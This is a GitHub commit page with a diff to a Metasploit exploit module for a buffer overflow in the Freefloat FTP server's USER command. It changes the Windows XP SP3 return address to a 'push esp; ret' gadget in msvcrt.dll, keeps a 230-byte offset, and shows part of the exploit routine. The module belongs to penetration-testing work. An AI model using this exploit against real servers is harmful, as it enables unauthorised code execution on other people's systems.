Skip to content

Commit d64208a

Browse files
committed
changed return address
1 parent f65e2ea commit d64208a

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

modules/exploits/windows/ftp/freefloatftp_user.rb

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -47,7 +47,7 @@ def initialize(info = {})
4747
[
4848
[ 'Windows XP SP3',
4949
{
50-
'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll
50+
'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll
5151
'Offset' => 230
5252
}
5353
],
@@ -75,5 +75,4 @@ def exploit
7575
send_user(buf)
7676
disconnect
7777
end
78-
7978
end

0 commit comments

Comments
 (0)